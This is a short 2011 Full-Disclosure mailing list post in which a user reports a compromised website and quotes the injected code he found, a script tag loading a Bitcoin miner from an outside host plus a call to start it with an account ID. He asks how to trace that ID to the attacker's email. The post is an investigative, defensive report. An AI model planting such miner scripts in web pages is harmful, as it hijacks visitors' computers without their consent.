[Full-disclosure] Compromised site using BitCoin
James Lay
jlay at slave-tothe-box.net
Mon Dec 12 17:11:36 GMT 2011
Group,
Recently I ran across the below on a site:
<script src="hxxp://www.bitcoinplus.com/js/miner.js"
type="text/javascript"></script>
<script type="text/javascript">BitcoinPlusMiner(10215318);</script>
I know the 10215318 represents the bitcoin email, but I was curious if
there was a way to figure out what the email actually was instead of the
number above. Would be nice to find out what email address may have been
involved in compromising the site. Thanks for any help you may be able
to provide.
James
Full-Disclosure is hosted and sponsored by Secunia.